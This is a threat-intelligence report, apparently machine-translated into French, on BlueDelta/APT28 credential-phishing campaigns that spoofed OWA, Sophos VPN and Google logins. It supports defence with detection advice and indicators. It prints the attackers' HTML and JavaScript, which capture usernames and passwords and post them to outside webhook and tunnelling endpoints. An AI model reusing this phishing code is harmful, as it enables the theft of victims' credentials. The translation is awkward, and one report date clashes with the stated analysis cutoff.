BlueDelta, liée à l'UGR, évolue vers la récolte identifiante
La date limite d'analyse pour ce rapport était le 11 septembre 2025.
Executive Summary
Entre février et septembre 2025, le site Recorded Future's Insikt Group a identifié plusieurs campagnes de collecte d'identifiants menées par BlueDelta, un groupe de menace parrainé par l'État russe et associé à la direction principale de l'état-major général des forces armées de la Fédération de Russie (GRU). Cette activité représente une expansion des opérations de vol d'identité menées par BlueDelta et décrites dans le rapport de décembre 2025 de Insikt Group.
Insikt Group a identifié BlueDelta comme ciblant un ensemble restreint mais distinct de victimes au cours de son activité de collecte d'identifiants en 2025. Les cibles comprenaient des personnes liées à une agence turque de recherche énergétique et nucléaire, ainsi que du personnel affilié à un groupe de réflexion européen et à des organisations de Macédoine du Nord et d'Ouzbékistan. L'utilisation de matériel de leurre en langue turque et ciblé au niveau régional suggère que BlueDelta a adapté son contenu pour accroître sa crédibilité auprès de publics professionnels et géographiques spécifiques. Ces sélections reflètent un intérêt constant pour les organisations liées à la recherche énergétique, à la coopération en matière de défense et aux réseaux de communication gouvernementaux en rapport avec les priorités des services de renseignement russes.
Les pages de BlueDelta destinées à recueillir des identifiants se faisaient passer pour une série de services légitimes de webmail et de VPN, notamment Microsoft Outlook Web Access (OWA), Google et les portails VPN de Sophos. Chaque page reproduisait des interfaces de connexion authentiques et redirigeait les victimes vers des sites web légitimes après qu'elles aient soumis leurs identifiants, réduisant ainsi les soupçons. La Campagne s'est fortement appuyée sur des services gratuits d'hébergement et de tunneling, tels que Webhook[.]site, InfinityFree, Byet Internet Services et ngrok, pour héberger des contenus de phishing, capturer les données des utilisateurs et gérer les redirections. Plusieurs pages ont également incorporé des documents PDF légitimes afin d'améliorer le réalisme et d'échapper à la détection automatique.
L'utilisation abusive par BlueDelta de l'infrastructure légitime des services Internet démontre que le groupe continue de s'appuyer sur des services jetables pour héberger et relayer des données d'identification. Ces campagnes soulignent l'engagement durable du GRU en faveur de la collecte d'identifiants en tant que méthode peu coûteuse et très rentable de collecte d'informations à l'appui des objectifs des services de renseignement russes.
Key Findings
- BlueDelta a étendu ses opérations de collecte d'identifiants tout au long de l'année 2025, en déployant de nouveaux portails de connexion Campagne, tels que Microsoft Outlook Web Access (OWA), Google et Sophos VPN.
- Le groupe a utilisé une combinaison de services gratuits d'hébergement et de tunneling, dont Webhook[.]site, InfinityFree, Byet Internet Services et ngrok, pour héberger des pages de collecte d'identifiants et exfiltrer des données volées.
- Plusieurs Campagne ont incorporé des documents PDF légitimes, tels que des publications du Gulf Research Center et de l'EcoClimate Foundation, afin d'augmenter l'apparence d'authenticité et de contourner les contrôles de sécurité des courriels.
- BlueDelta a utilisé des fonctions JavaScript personnalisées pour capturer les identifiants, suivre l'activité des victimes et automatiser la redirection vers des sites web légitimes, réduisant ainsi la configuration manuelle et augmentant l'efficacité opérationnelle.
- Les adresses électroniques ciblées et le comportement de redirection suggèrent que BlueDelta s'est concentré sur les chercheurs et les institutions de Turquie et d'Europe, s'alignant ainsi sur les priorités plus larges de la Russie en matière de collecte de renseignements.
Background
BlueDelta est un groupe de menace parrainé par l'État russe et associé à la direction principale de l'état-major général des forces armées de la Fédération de Russie (GRU). Également connu sous les noms d'APT28, Fancy Bear et Forest Blizzard, le groupe mène des opérations de collecte d'identifiants et d'espionnage depuis plus de dix ans. Cette campagne coïncide avec des activités précédemment attribuées par Insikt Group à BlueDelta, que plusieurs gouvernements occidentaux attribuent avec une grande certitude au GRU.
Depuis au moins le milieu des années 2000, BlueDelta a mené des opérations d'hameçonnage et de vol d'identité contre un large éventail de cibles, notamment des institutions gouvernementales, des entreprises de défense, des fournisseurs d'armes, des entreprises de logistique et des groupes de réflexion politique. Ces efforts visent à collecter des identifiants et des renseignements pertinents pour les opérations militaires et les intérêts stratégiques de la Russie. Les activités précédemment signalées se concentraient sur Microsoft Outlook, UKR.NET et d'autres services de messagerie web, en utilisant de faux portails de connexion hébergés sur des infrastructures web gratuites et en compromettant des routeurs pour capturer des noms d'utilisateur, des mots de passe et des codes d'authentification.
Analyse technique
Entre février et septembre 2025, Insikt Group a analysé une série de Campagne d'identification attribuée à BlueDelta. Ces campagnes démontrent que BlueDelta continue d'affiner sa technique de spearphishing, en adoptant de nouveaux thèmes de leurre, des chaînes de redirection en plusieurs étapes et des mécanismes améliorés de collecte d'identifiants. Chaque Campagne a abusé de services d'hébergement et de tunneling gratuits pour héberger des contenus malveillants et relayer les données récoltées, ce qui témoigne de l'utilisation persistante par BlueDelta d'une infrastructure peu coûteuse et facilement jetable.
Microsoft OWA identifiant Harvesting
Le 6 février 2025, BlueDelta a déployé une nouvelle page de collecte d'identifiants sous la forme d'une page de connexion Microsoft Outlook Web Access (OWA), comme le montre la figure 1.
BlueDelta a utilisé le service de raccourcissement de liens ShortURL pour la première étape de la redirection, en utilisant l'URL hxxps://shorturl[.]at/Be4Xe. Le lien raccourci redirigeait les victimes vers une deuxième étape, hébergée par le service API gratuit Webhook[.]site, via l'URL hxxps://webhook[.]site/e8ae3bbd-ab02-46b7-b84c-f5f4baa5d7c7. BlueDelta a régulièrement utilisé Webhook[.]site pour la collecte d'identifiants et l'hameçonnage (phishing) dans la Campagne récente.
Le premier webhook de cette Campagne diffère de ceux précédemment signalés par le groupe Inskit ; au lieu d'héberger la page de collecte d'identifiants, il utilise HTML pour charger un document de leurre PDF dans le navigateur de la victime pendant deux secondes avant d'être redirigé vers un second webhook, comme le montre la figure 2.
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width">
<meta http-equiv="refresh" content="2; url=hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4">
</head>
<body>
<object data="hxxps://www[.]grc[.]net/documents/68527c604ba00StrategicandPoliticalImplicationsforIsraelandIran2[.]pdf" type="application/pdf" style="min-height:100vh;width:100%"></object>
</body>
</html>
Figure 2: HTML utilisé pour afficher un leurre PDF sur le navigateur de la victime (sources : Recorded Future)
Le document PDF leurre, illustré à la figure 3, est un rapport légitime publié par le groupe de réflexion Gulf Research Center (GRC), basé en Arabie Saoudite, intitulé "Implications stratégiques et politiques pour Israël et l'Iran : The Day After War" (Implications stratégiques et politiques pour Israël et l'Iran : le lendemain de la guerre).
Après l'affichage du leurre PDF pendant deux secondes, la page redirige vers un second webhook situé à l'URL hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4, qui héberge une page de connexion OWA usurpée, comme le montre la figure 1. La structure de la page est très similaire à celle des précédentes pages de collecte d'identifiants BlueDelta, mais le thème a été mis à jour pour représenter une page de connexion plutôt qu'une page de réinitialisation de mot de passe.
Comme le montre la figure 4, BlueDelta a ajouté un nouvel élément de formulaire HTML caché utilisé pour stocker l'URL de la page en cours. L'élément HTML est rempli à l'aide de JavaScript lors du chargement de la page, comme le montre la figure 5, et est ensuite utilisé pour saisir les informations relatives à la victime lorsque la page s'ouvre et que les identifiants sont soumis. Cette mise à jour réduit la charge administrative de BlueDelta en éliminant la nécessité d'ajouter manuellement l'URL d'exfiltration aux pages de collecte d'identifiants.
<input type="hidden" id="href" name="href" role="textbox" aria-labelledby="userNameLabel" value="hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4"></div>Figure 4: Élément de formulaire HTML caché rempli à l'aide de l'URL de la page au chargement de la page (sources : Recorded Future)
<script>
const urlParams = new URLSearchParams(window.location.search);
const user = urlParams.get('u');
document.getElementById('username').value = user;
document.getElementById('href').value = window.location.href;
var xhr = new XMLHttpRequest();
xhr.open('POST', document.getElementById('href').value);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({"page_opened": user}));
window.history.pushState({}, document.title, '/owa/');
</script>
Figure 5: JavaScript utilisé pour capturer l'URL actuelle, définir un élément de formulaire caché, envoyer une balise "page ouverte" et modifier l'URL affichée dans le navigateur de la victime (sources : Recorded Future).
L'URL stockée est ensuite utilisée comme destination d'une balise de page ouverte, qui collecte l'adresse électronique de la victime à partir du paramètre "u=" de la chaîne de requête et l'envoie au format JSON au webhook. Le webhook capture également l'adresse IP et l'agent utilisateur de la victime. Après l'enregistrement de l'URL de la page et l'envoi de la balise d'ouverture de la page, BlueDelta modifie l'URL de la page en /owa/ afin d'imiter une page de connexion OWA légitime.
Lorsque le formulaire HTML est soumis, une fonction JavaScript nommée myFunction capture le nom d'utilisateur et le mot de passe saisis et les envoie via une requête HTTP POST au webhook de l'élément de formulaire caché. La page est ensuite redirigée vers le PDF du GRC hébergé sur le site web du GRC après un délai d'une seconde, comme le montre la figure 6.
function myFunction()
{
var username = document.getElementById("username").value ;
var oldPwd = document.getElementById("oldPwd").value ;
var xhr = new XMLHttpRequest() ;
xhr.open('POST', document.getElementById('href').value, false) ;
xhr.setRequestHeader('Content-Type', 'application/json') ;
xhr.send(JSON.stringify({"nom d'utilisateur": username, "oldPwd": oldPwd})) ;
setTimeout("location.href = 'hxxps://www[.]grc[.]net/documents/68527c604ba00StrategicandPoliticalImplicationsforIsraelandIran2[.]pdf' ;",1000);}
Figure 6: Fonction JavaScript utilisée pour envoyer le nom d'utilisateur et le mot de passe au webhook de l'attaquant avant de rediriger vers le fichier PDF du GRC (sources : Recorded Future)
Cette fonction ressemble beaucoup à celles utilisées dans les précédentes Campagne de récolte d'identifiants BlueDelta, comme le montre la figure 7.
function myFunction()
{
var username = document.getElementById("username").value ;
var oldPwd = document.getElementById("oldPwd").value ;
var newPwd1 = document.getElementById("newPwd1").value ;
var newPwd2 = document.getElementById("newPwd2").value ;
var xhr = new XMLHttpRequest() ;
xhr.open('POST', 'hxxps://enmrgkf41bifd[.]x[.]pipedream[.]net', false) ;
xhr.setRequestHeader('Content-Type', 'application/json') ;
xhr.send(JSON.stringify({"nom d'utilisateur": username, "oldPwd": oldPwd, "newPwd1": newPwd1, "newPwd2": newPwd2})) ;
document.getElementById("lgnDiv").remove() ;
document.getElementById("changed").style.display = "block";}
Figure 7: Fonction JavaScript utilisée par BlueDelta dans une page d'identification précédente sur le thème de la réinitialisation du mot de passe (sources : Recorded Future)
Dans sa dernière campagne, BlueDelta a attiré les victimes avec une page de connexion plutôt qu'une page de réinitialisation du mot de passe. Au lieu d'écrire une nouvelle fonction JavaScript, BlueDelta a modifié le code existant, comme le montre la réutilisation de la variable OldPwd au lieu de Pwd. Le processus de collecte d'identifiants mis à jour comprend au total sept étapes, comme le montre la figure 8.
Le 16 juillet 2025, BlueDelta a créé une nouvelle page de collecte d'identifiants en utilisant le service API gratuit Webhook[.]site, hébergé via l'URL hxxps://webhook[.]site/ff237e88-cbaf-4b0b-b787-6e2f1f2c926f. La nouvelle page a été conçue pour imiter un portail de connexion OWA et a incorporé un texte en langue turque.
Insikt Group a découvert deux versions de cette URL qui contenaient des paramètres de chaîne de requête, y compris des adresses électroniques cibles. Selon OSINT, les adresses électroniques appartenaient à des scientifiques et des chercheurs turcs dans le domaine des énergies renouvelables.
La page d'identification utilise un fichier PDF légitime intitulé "CLIMATE ACTION AS A STRATEGIC PRIORITY FOR THE NEW PACT FOR THE MEDITERRANEAN" et hébergé à l'URL hxxps://eccoclimate[.]org/wp-content/uploads/2025/07/MATTCCh-Pact4MED[.]pdf, comme le montre la figure 9. Le domaine eccoclimate[.]org est associé à la Fondation EcoClimate, une organisation à but non lucratif qui se consacre à la sensibilisation à la pollution et au changement climatique. Elle préconise également des stratégies sensibles au climat pour atténuer les effets néfastes du changement climatique.
Comme pour la page d'identification et de récolte précédente, BlueDelta a utilisé le JavaScript en ligne pour afficher le leurre PDF avant de présenter le formulaire d'identification et de récolte. Comme le montre la figure 10, le premier script capture le nom d'utilisateur cible à partir de l'URL de la page et l'enregistre dans une variable, qui a été renommée "nom d'utilisateur" en "nom d'utilisateur caché".
Cette modification du script permet à BlueDelta de capturer à la fois l'adresse électronique intégrée dans le lien d'hameçonnage et celle saisie dans le formulaire de collecte d'identifiants. Conformément à son comportement antérieur, le script envoie la balise de page ouverte avant de modifier l'URL affichée en "/pdfviewer?pdf=browser", qui est probablement destinée à imiter un outil de visualisation de PDF.
const urlParams = new URLSearchParams(window.location.search);
const user = urlParams.get('u');
document.getElementById('usernamehidden').value = user;
document.getElementById('href').value = window.location.href;
var xhr = new XMLHttpRequest();
xhr.open('POST', document.getElementById('href').value);
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.send(JSON.stringify({"page_opened": user}));
window.history.pushState({}, document.title, '/pdfviewer?pdf=browser');
Figure 10: JavaScript utilisé pour capturer l'adresse électronique d'un utilisateur, envoyer une balise d'ouverture de page et modifier l'URL d'un navigateur afin d'usurper l'identité d'un lecteur de PDF (sources : Recorded Future).
Lorsque la cible soumet le formulaire d'identification, le script mis à jour(figure 11) transmet le nom d'utilisateur et le mot de passe saisis, ainsi que le nom d'utilisateur capturé à partir de l'URL, au même point de terminaison webhook qui héberge la page ; après une seconde, la page est redirigée vers le leurre PDF. Dans la dernière version du script, BlueDelta a corrigé le nom de la variable du mot de passe, auparavant incorrect, de "OldPwd" à "password".
Function myFunction()
{
var usernamehidden = document.getElementById("usernamehidden").value ;
var username = document.getElementById("username").value ;
var password = document.getElementById("password").value ;
var xhr = new XMLHttpRequest() ;
xhr.open('POST', document.getElementById('href').value, false) ;
xhr.setRequestHeader('Content-Type', 'application/json') ;
xhr.send(JSON.stringify({"usernamehidden": usernamehidden, "username": username, "password": password})) ;
setTimeout("location.href = 'hxxps://eccoclimate[.]org/wp-content/uploads/2025/07/MATTCCh-Pact4MED[.]pdf' ;",1000) ;
}
Figure 11 : JavaScript utilisé pour capturer les identifiants et l'email de l'utilisateur avant de rediriger vers le document de leurre PDF (sources : Recorded Future)
Sophos VPN identifiant Harvesting
Le 4 juin 2025, BlueDelta a déployé une nouvelle page de collecte d'identifiants présentée comme une page de réinitialisation du mot de passe du VPN Sophos, comme le montre la figure 12.
La page de collecte des identifiants était hébergée via l'URL hxxps://config-settings[.]kesug[.]com/sogfdshxncvsad. Le domaine associé config-settings[.]kesug[.]com résolu vers l'adresse IP du Royaume-Uni 185[.]27[.]134[.]125 et appartient à InfinityFree, un hébergeur gratuit dont BlueDelta abuse fréquemment.
La structure de la page est très similaire à celle des pages de récolte d'identifiants BlueDelta signalées par Insikt Group.
Au chargement de la page, la fonction JavaScript yrejxcdgf_dgufun est exécutée, ce qui permet de copier l'URL de la page et d'extraire un identifiant de victime binaire unique codé en hexadécimal sur 32 octets à partir du paramètre "eruvl=" de la chaîne d'interrogation. L'identifiant est stocké dans une variable avant d'être envoyé dans une requête HTTP POST à l'URL hxxps://config-settings[.]kesug[.]com/sogfdshxncvsad/npp[.]php, qui est récupérée à partir de la variable "l", comme le montre la figure 13.
let l = "hxxps://config-settings[.]kesug[.]com/sogfdshxncvsad/npp[.]php";
function yrejxcdgf_dgufjn() {
let tdsyxc = new URLSearchParams(window.location.search.slice(1));
siudhfic = tdsyxc.get('eruvl')
let xwgyznjvhr = new XMLHttpRequest();
xwgyznjvhr.open("POST", l);
xwgyznjvhr.setRequestHeader("Accept", "application/json");
xwgyznjvhr.setRequestHeader("Content-Type", "application/json");
let errt = `{
ifd: ${siudhfic}
}`;
xwgyznjvhr.send(errt);
}
window.onload = yrejxcdgf_dgufjn;
Figure 13 : Fonction JavaScript utilisée pour envoyer une balise de page ouverte contenant l'identifiant de la victime (sources : Recorded Future)
Si la victime saisit ses identifiants dans le formulaire et clique sur "Connexion", la fonction defun vérifie que les champs ne sont pas vides. S'ils sont valides, le script construit une charge utile contenant les entrées ainsi que l'identifiant unique de la victime provenant de l'URL(eruvl) et l'exfiltre via une requête HTTP POST vers la même URL que la balise ouverte sur la page. Après un court délai, la victime est redirigée vers une URL et le port fixe 4443, comme le montre la figure 14.
async function defun() {
var ifd = document.getElementById("trhzc").value;
var svcxik = document.getElementById("wetrbb").value;
var dfssdfwre = document.getElementById("tqzkxc").value;
var toxcjvn = 2;
let tdsyxc = new URLSearchParams(window.location.search.slice(1));
if (pwdcheck(svcxik)){
if(pwdcheck(dfssdfwre)){
if(pwdcheck(toxcjvn)){
if(pwdcheck(ifd)){
siudhfic = tdsyxc.get('eruvl')
let wgyznjv = new XMLHttpRequest();
wgyznjv.open("POST", l);
wgyznjv.setRequestHeader("Accept", "application/json");
wgyznjv.setRequestHeader("Content-Type", "application/json");
let errt = `{
siudhfic: ${siudhfic},
ifd: ${ifd},
svcxik: ${svcxik},
dfssdfwre: ${dfssdfwre},
toxcjvn: ${toxcjvn}
}`;
wgyznjv.send(errt);
await sleep(500);
window.location.replace("hxxps://REDACTED:4443");
}
else
u_err();}
else
pwd_nr_err();}
else
pwd_n_err();}
else
{pwd_err();};}
Figure 14 : Fonction JavaScript utilisée pour valider le formulaire HTML et renvoyer les détails de la victime à l'attaquant (sources : Recorded Future)
L'URL et le port fixe hébergent un portail Sophos VPN légitime qui appartient à un groupe de réflexion de l'UE. Le fait que la page de collecte d'identifiants redirige vers ce portail indique clairement que le groupe de réflexion est la cible visée par BlueDelta.
Récolte identifiante des mots de passe expirés de Microsoft OWA
Le 11 septembre 2025, BlueDelta a utilisé le domaine InfinityFree account-settings-shsvchx[.]wuaze[.]com d'héberger deux pages distinctes de collecte d'identifiants sur les URL hxxps://account-settings-shsvchx[.]wuaze[.]com/uzdfbdhyzxjc et hxxps://account-settings-shsvchx[.]wuaze[.]com/sidsixcnvxcucx. Les deux pages étaient présentées comme des pages de mot de passe expiré d'OWA et utilisaient un code JavaScript presque identique à celui de la page VPN de Sophos décrite précédemment, comme le montre la figure 15.
Le seul changement notable est une mise à jour du nom de fichier de la capture d'identification, qui utilise ald.php au lieu de npp.php.
Comme indiqué sur la page du VPN Sophos, les deux pages OWA redirigeaient vers une page de connexion légitime après l'envoi du formulaire. Cette redirection est probablement destinée à faire paraître la tentative de collecte d'identifiants plus légitime, la destination finale de la redirection reflétant probablement l'entreprise ciblée. La première page redirige les victimes vers une page de connexion OWA associée à une organisation militaire de la République de Macédoine du Nord. La deuxième page redirige les victimes vers une page de connexion OWA associée à un intégrateur informatique basé en Ouzbékistan.
Google Password Reset identifiant Harvesting
Le 15 avril 2025, Insikt Group a identifié une nouvelle page de collecte d'identifiants présentée comme une page de réinitialisation de mot de passe Google, comme le montre la figure 16.
Figure 16 : Page de réinitialisation de mot de passe sur le thème de Google (sources : Recorded Future)
La page est rendue en portugais et est hébergée sur le domaine account-security-googie[.]my-board[.]org. My-board[.]org est un domaine apex gratuit proposé par l'hébergeur Byet Internet Services. La page utilise un formulaire HTML pour capturer les identifiants cibles, qui sont validés à l'aide de JavaScript en ligne et envoyés à l'URL hxxps://d3ef-2804-37f8-400-2cbf-4996-e46a-4802-5c08[.]ngrok-free[.]app.
Le domaine apex ngrok-free[.]app est associé au service de proxy inverse ngrok distribué à l 'échelle mondiale. ngrok offre un service gratuit qui permet aux utilisateurs de connecter des serveurs situés derrière un pare-feu à un serveur proxy et d'exposer ce serveur à l'internet sans modifier les règles du pare-feu. Insikt Group a déjà documenté l' utilisation abusive par BlueDelta de Byet Internet Services et de ngrok pour la collecte d'informations d'identification.
Un deuxième domaine, account-security-googie[.]rf[.]gd, a été enregistré le même jour et a utilisé le même typosquat Google. Cette fois, l'acteur malveillant a utilisé le domaine apex rf[.]gd, qui est associé à la société d'hébergement InfinityFree décrite précédemment. Le domaine InfinityFree hébergeait une page de collecte d'identifiants Google identique à celle du domaine Byet, utilisant du texte portugais et la même URL ngrok pour la capture d'identifiants.
Insikt Group n'a pas encore observé que BlueDelta utilisait des pages de collecte d'identifiants sur le thème de Google dans sa Campagne passée ; cependant, l'utilisation constante des domaines Byet et InfinityFree, ainsi que ngrok pour l'exfiltration, et d'autres similitudes dans l'exécution des opérations indiquent un chevauchement probable. Sur la base de ces parallèles, nous estimons que cette activité est probablement associée à BlueDelta.
Mitigations
Les organisations peuvent atténuer les risques liés à cette campagne en prenant les mesures suivantes :
- Leverage Recorded Future Renseignement sur les menaces:
- Utilisez les listes de risques constamment mises à jour de Recorded Future pour identifier et bloquer les infrastructures BlueDelta connues.
- Activez l'alerte dans la plate-forme Recorded Future Intelligence Operations Platform pour les domaines ou IP nouvellement enregistrés liés à Webhook[.]site, InfinityFree, Byet Internet Services, ngrok et ShortURL
- Utilisez Recorded Future renseignements sur l'identité pour surveiller les fuites ou la réutilisation d'identifiants associés à des domaines d'entreprise.
- Mettez en œuvre des mesures de protection spécifiques :
- Renforcez les mots de passe forts et uniques et activez l'authentification multifactorielle (MFA), en donnant la priorité aux méthodes résistantes au phishing telles que les authentificateurs matériels ou basés sur des applications.
- Refusez d'inscrire sur la liste les services d'hébergement et de tunneling gratuits qui ne sont pas nécessaires aux opérations commerciales, y compris le site Webhook[.], InfinityFree, Byet Internet Services, ngrok et ShortURL
- Surveillez les journaux de courrier électronique et de passerelle Web pour y trouver des pièces jointes PDF ou des liens intégrés faisant référence à la vérification du compte, à la réinitialisation du mot de passe ou à des problèmes d'ouverture de session.
- Suivre les tentatives d'authentification à partir de services proxy ou de ports non standard, en particulier ceux associés aux tunnels ngrok.
- Adoptez les meilleures pratiques générales :
- Organisez régulièrement des formations de sensibilisation au phishing axées sur les faux portails de connexion et les leurres sur le thème de la sécurité.
- Maintenir un plan de réponse incident en cas de compromission identifiée, y compris des procédures définies d'escalade, de réinitialisation des comptes et de confinement.
- Examinez périodiquement les dépendances des services externes afin d'éviter toute exposition inutile à des services web gratuits ou non vérifiés.
Outlook
Sur la base des éléments décrits dans le présent rapport, BlueDelta devrait continuer à mener des opérations de collecte d'identifiants jusqu'au début de l'année 2026, en se concentrant sur les utilisateurs gouvernementaux, politiques et liés à la recherche dans les régions d'importance stratégique pour la Russie. La capacité démontrée du groupe à adapter son infrastructure et à donner un nouveau nom aux pages d'identification suggère qu'il continuera à abuser des services gratuits d'hébergement, de tunneling et de raccourcissement de liens afin de réduire ses coûts opérationnels et d'obscurcir ses attributions.
À l'avenir, Campagne introduira probablement de nouveaux thèmes de leurre et un contenu localisé pour mieux attirer les cibles régionales, y compris des pages d'hameçonnage spécifiques à une langue ou à un secteur. L'utilisation par BlueDelta de documents légitimes et la redirection vers des portails authentiques indiquent que l'accent est mis sur la furtivité et l'exploitation de la confiance des utilisateurs plutôt que sur une compromission à grande échelle.
Annexe A : Indicateurs de compromission
Domains:
account-security-googie[.]my-board[.]org
account-security-googie[.]rf[.]gd
account-settings-shsvchx[.]wuaze[.]com
config-settings[.]kesug[.]com
enmrgkf41bifd[.]x[.]pipedream[.]net
IP Addresses:
172[.]111[.]206[.]103
185[.]27[.]134[.]125
URLs:
hxxps://account-settings-shsvchx[.]wuaze[.]com/uzdfbdhyzxjc
hxxps://account-settings-shsvchx[.]wuaze[.]com/uzdfbdhyzxjc/ald.php
hxxps://account-settings-shsvchx[.]wuaze[.]com/sidsixcnvxcucxv
hxxps://account-settings-shsvchx[.]wuaze[.]com/sidsixcnvxcucxv/ald.php
hxxps://config-settings[.]kesug[.]com/sogfdshxncvsad
hxxps://config-settings[.]kesug[.]com/sogfdshxncvsad/npp[.]php
hxxps://d3ef-2804-37f8-400-2cbf-4996-e46a-4802-5c08[.]ngrok-free[.]app
hxxps://shorturl[.]at/Be4Xe
hxxps://webhook[.]site/3791f8c0-1308-4c5b-9c82-0dc416aeb9c4
hxxps://webhook[.]site/e8ae3bbd-ab02-46b7-b84c-f5f4baa5d7c7
hxxps://webhook[.]site/ff237e88-cbaf-4b0b-b787-6e2f1f2c926f
Appendix B: MITRE ATT&CK Techniques
Annexe C : Modèle BlueDelta Diamond
